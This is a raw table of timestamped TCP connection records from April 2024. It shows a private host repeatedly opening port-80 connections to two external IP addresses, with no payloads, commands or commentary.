Apr 26, 2024 11:47:33.917741060 CEST	49719	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:33.917766094 CEST	49719	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:34.241972923 CEST	80	49719	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:34.821923971 CEST	80	49719	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:34.821954012 CEST	80	49719	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:34.822174072 CEST	49719	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:34.822412968 CEST	49719	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:34.826395035 CEST	49720	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:35.144359112 CEST	80	49719	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:35.150650978 CEST	80	49720	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:35.150820017 CEST	49720	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:35.150964975 CEST	49720	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:35.151002884 CEST	49720	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:35.474416018 CEST	80	49720	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:36.358182907 CEST	80	49720	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:36.358212948 CEST	80	49720	119.204.11.2	192.168.2.5
Apr 26, 2024 11:47:36.358319044 CEST	49720	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:36.358530998 CEST	49720	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:47:36.682049036 CEST	80	49720	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:43.040369034 CEST	49722	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:43.362478971 CEST	80	49722	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:43.367121935 CEST	49722	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:43.367328882 CEST	49722	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:43.367362976 CEST	49722	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:43.688973904 CEST	80	49722	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:44.553025007 CEST	80	49722	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:44.553040981 CEST	80	49722	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:44.553095102 CEST	49722	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:44.553783894 CEST	49722	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:44.659430027 CEST	49723	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:44.876194954 CEST	80	49722	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:44.982142925 CEST	80	49723	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:44.985202074 CEST	49723	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:44.986284971 CEST	49723	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:44.986316919 CEST	49723	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:45.309604883 CEST	80	49723	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:46.168170929 CEST	80	49723	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:46.168193102 CEST	80	49723	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:46.168271065 CEST	49723	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:46.172502041 CEST	49723	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:46.390078068 CEST	49724	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:46.495284081 CEST	80	49723	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:46.715344906 CEST	80	49724	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:46.715451002 CEST	49724	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:46.715630054 CEST	49724	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:46.715683937 CEST	49724	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:47.067172050 CEST	80	49724	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:47.913717985 CEST	80	49724	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:47.913731098 CEST	80	49724	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:47.913938046 CEST	49724	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:47.914045095 CEST	49724	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:47.983084917 CEST	49725	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:48.241354942 CEST	80	49724	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:48.305588007 CEST	80	49725	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:48.305672884 CEST	49725	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:48.305830002 CEST	49725	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:48.305830956 CEST	49725	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:48.628324986 CEST	80	49725	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:49.475702047 CEST	80	49725	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:49.475847960 CEST	80	49725	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:49.475948095 CEST	49725	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:49.476047039 CEST	49725	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:49.716361046 CEST	49726	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:49.798711061 CEST	80	49725	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:50.067487955 CEST	80	49726	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:50.067576885 CEST	49726	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:50.067756891 CEST	49726	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:50.067790985 CEST	49726	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:50.393011093 CEST	80	49726	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:51.259509087 CEST	80	49726	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:51.259526968 CEST	80	49726	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:51.259641886 CEST	49726	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:51.259820938 CEST	49726	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:51.585020065 CEST	80	49726	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:53.649585962 CEST	49727	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:53.977329969 CEST	80	49727	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:53.977485895 CEST	49727	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:53.977641106 CEST	49727	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:53.977664948 CEST	49727	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:54.300647974 CEST	80	49727	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:55.158829927 CEST	80	49727	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:55.159082890 CEST	80	49727	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:55.159148932 CEST	49727	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:55.159179926 CEST	49727	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:55.482728004 CEST	80	49727	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:55.573549032 CEST	49728	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:55.896133900 CEST	80	49728	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:55.896250963 CEST	49728	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:55.896378040 CEST	49728	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:55.896392107 CEST	49728	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:56.219326973 CEST	80	49728	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:57.080249071 CEST	80	49728	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:57.080279112 CEST	80	49728	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:57.080383062 CEST	49728	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:57.080566883 CEST	49728	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:57.225584984 CEST	49729	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:57.402868986 CEST	80	49728	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:57.548295021 CEST	80	49729	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:57.548372984 CEST	49729	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:57.550009012 CEST	49729	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:57.550569057 CEST	49729	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:57.874655962 CEST	80	49729	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:58.732377052 CEST	80	49729	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:58.732440948 CEST	80	49729	119.204.11.2	192.168.2.5
Apr 26, 2024 11:48:58.732491970 CEST	49729	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:58.732606888 CEST	49729	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:48:59.064441919 CEST	80	49729	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:00.573503971 CEST	49730	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:00.896552086 CEST	80	49730	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:00.896761894 CEST	49730	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:00.896944046 CEST	49730	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:00.896979094 CEST	49730	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:01.220206976 CEST	80	49730	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:02.087163925 CEST	80	49730	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:02.087191105 CEST	80	49730	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:02.087517023 CEST	49730	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:02.087563038 CEST	49730	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:02.411286116 CEST	80	49730	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:05.560939074 CEST	49731	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:05.885426044 CEST	80	49731	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:05.885505915 CEST	49731	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:05.885668993 CEST	49731	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:05.885682106 CEST	49731	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:06.210486889 CEST	80	49731	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:07.073163986 CEST	80	49731	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:07.073179960 CEST	80	49731	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:07.073381901 CEST	49731	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:07.073518991 CEST	49731	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:07.399168968 CEST	80	49731	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:12.399307013 CEST	49732	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:12.722743988 CEST	80	49732	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:12.722881079 CEST	49732	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:12.723020077 CEST	49732	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:12.723020077 CEST	49732	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:13.065160036 CEST	80	49732	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:13.929617882 CEST	80	49732	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:13.929637909 CEST	80	49732	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:13.929790020 CEST	49732	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:13.929934025 CEST	49732	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:14.253616095 CEST	80	49732	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:18.041310072 CEST	49733	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:18.365158081 CEST	80	49733	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:18.365328074 CEST	49733	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:18.365467072 CEST	49733	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:18.365525007 CEST	49733	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:18.689563990 CEST	80	49733	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:19.557686090 CEST	80	49733	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:19.557713032 CEST	80	49733	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:19.557786942 CEST	49733	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:19.557928085 CEST	49733	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:19.881444931 CEST	80	49733	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:23.318275928 CEST	49734	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:23.641263962 CEST	80	49734	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:23.641369104 CEST	49734	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:23.641505003 CEST	49734	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:23.641547918 CEST	49734	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:23.964565039 CEST	80	49734	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:24.831507921 CEST	80	49734	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:24.831525087 CEST	80	49734	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:24.831603050 CEST	49734	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:24.831748009 CEST	49734	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:25.154597044 CEST	80	49734	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:30.389421940 CEST	49735	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:30.712371111 CEST	80	49735	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:30.712516069 CEST	49735	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:30.712687016 CEST	49735	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:30.712704897 CEST	49735	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:31.064341068 CEST	80	49735	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:31.674782991 CEST	80	49735	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:31.674819946 CEST	80	49735	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:31.674891949 CEST	49735	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:31.675033092 CEST	49735	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:31.997813940 CEST	80	49735	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:35.269278049 CEST	49736	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:35.592439890 CEST	80	49736	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:35.592562914 CEST	49736	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:35.592735052 CEST	49736	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:35.592763901 CEST	49736	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:35.916209936 CEST	80	49736	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:36.786492109 CEST	80	49736	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:36.786562920 CEST	80	49736	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:36.786667109 CEST	49736	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:36.786803007 CEST	49736	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:37.125389099 CEST	80	49736	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:40.445143938 CEST	49737	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:40.768191099 CEST	80	49737	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:40.768364906 CEST	49737	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:40.768532991 CEST	49737	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:40.768552065 CEST	49737	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:41.091548920 CEST	80	49737	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:41.952558041 CEST	80	49737	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:41.952574968 CEST	80	49737	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:41.952640057 CEST	49737	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:41.952862024 CEST	49737	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:42.275760889 CEST	80	49737	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:47.539386034 CEST	49738	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:47.864252090 CEST	80	49738	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:47.864358902 CEST	49738	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:47.864492893 CEST	49738	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:47.864531994 CEST	49738	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:48.189017057 CEST	80	49738	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:49.062968016 CEST	80	49738	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:49.062992096 CEST	80	49738	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:49.063091993 CEST	49738	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:49.063257933 CEST	49738	80	192.168.2.5	119.204.11.2
Apr 26, 2024 11:49:49.387805939 CEST	80	49738	119.204.11.2	192.168.2.5
Apr 26, 2024 11:49:55.924221039 CEST	49739	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:49:56.135256052 CEST	80	49739	190.187.52.42	192.168.2.5
Apr 26, 2024 11:49:56.135483027 CEST	49739	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:49:56.135561943 CEST	49739	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:49:56.135561943 CEST	49739	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:49:56.345352888 CEST	80	49739	190.187.52.42	192.168.2.5
Apr 26, 2024 11:49:56.765465975 CEST	80	49739	190.187.52.42	192.168.2.5
Apr 26, 2024 11:49:56.770374060 CEST	80	49739	190.187.52.42	192.168.2.5
Apr 26, 2024 11:49:56.770462036 CEST	49739	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:49:56.770513058 CEST	49739	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:49:56.980571032 CEST	80	49739	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:02.278568983 CEST	49740	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:02.490441084 CEST	80	49740	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:02.490520000 CEST	49740	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:02.490715027 CEST	49740	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:02.490747929 CEST	49740	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:02.700270891 CEST	80	49740	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:03.125268936 CEST	80	49740	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:03.125344038 CEST	80	49740	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:03.125596046 CEST	49740	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:03.125597000 CEST	49740	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:03.335153103 CEST	80	49740	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:06.893023968 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.105874062 CEST	80	49741	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:07.105957985 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.106115103 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.106133938 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.315989017 CEST	80	49741	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:07.740850925 CEST	80	49741	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:07.740919113 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.750643969 CEST	80	49741	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:07.750700951 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.750883102 CEST	49741	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:07.965986967 CEST	80	49741	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:11.445924044 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:11.655334949 CEST	80	49742	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:11.655494928 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:11.655695915 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:11.655695915 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:11.865330935 CEST	80	49742	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:12.405599117 CEST	80	49742	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:12.405752897 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:12.415462971 CEST	80	49742	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:12.415535927 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:12.415712118 CEST	49742	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:12.625356913 CEST	80	49742	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:15.876755953 CEST	49743	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:16.085619926 CEST	80	49743	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:16.085709095 CEST	49743	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:16.085963964 CEST	49743	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:16.085999012 CEST	49743	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:16.295680046 CEST	80	49743	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:17.080611944 CEST	80	49743	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:17.085536957 CEST	80	49743	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:17.085649014 CEST	49743	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:17.085740089 CEST	49743	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:17.295734882 CEST	80	49743	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:22.848433018 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:23.070650101 CEST	80	49744	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:23.070766926 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:23.070924997 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:23.070951939 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:23.280860901 CEST	80	49744	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:23.925858974 CEST	80	49744	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:23.925966978 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:23.940831900 CEST	80	49744	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:23.940917969 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:23.941047907 CEST	49744	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:24.150760889 CEST	80	49744	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:27.972529888 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:28.180521965 CEST	80	49745	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:28.180674076 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:28.180860996 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:28.180893898 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:28.390839100 CEST	80	49745	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:28.832189083 CEST	80	49745	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:28.832253933 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:28.836678982 CEST	80	49745	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:28.836738110 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:28.836877108 CEST	49745	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:29.046286106 CEST	80	49745	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:32.534576893 CEST	49746	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:32.759238958 CEST	80	49746	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:32.759334087 CEST	49746	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:32.759541035 CEST	49746	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:32.759586096 CEST	49746	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:32.971508026 CEST	80	49746	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:33.775856972 CEST	80	49746	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:33.780529022 CEST	80	49746	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:33.780606031 CEST	49746	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:33.780766010 CEST	49746	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:33.990421057 CEST	80	49746	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:39.327240944 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:39.540563107 CEST	80	49747	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:39.540641069 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:39.540791988 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:39.540822983 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:39.750782967 CEST	80	49747	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:40.275767088 CEST	80	49747	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:40.275830030 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:40.280530930 CEST	80	49747	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:40.280585051 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:40.280725002 CEST	49747	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:40.530647993 CEST	80	49747	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:44.023452044 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:44.235913038 CEST	80	49748	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:44.236027956 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:44.236303091 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:44.236303091 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:44.445709944 CEST	80	49748	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:44.895677090 CEST	80	49748	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:44.895908117 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:44.900590897 CEST	80	49748	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:44.900676012 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:44.900886059 CEST	49748	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:45.125719070 CEST	80	49748	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:49.500961065 CEST	49749	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:49.710697889 CEST	80	49749	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:49.710975885 CEST	49749	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:49.712608099 CEST	49749	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:49.712645054 CEST	49749	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:49.920804977 CEST	80	49749	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:50.450947046 CEST	80	49749	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:50.451194048 CEST	49749	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:50.460535049 CEST	80	49749	190.187.52.42	192.168.2.5
Apr 26, 2024 11:50:50.460614920 CEST	49749	80	192.168.2.5	190.187.52.42
Apr 26, 2024 11:50:50.460830927 CEST	49749	80	192.168.2.5	190.187.52.42
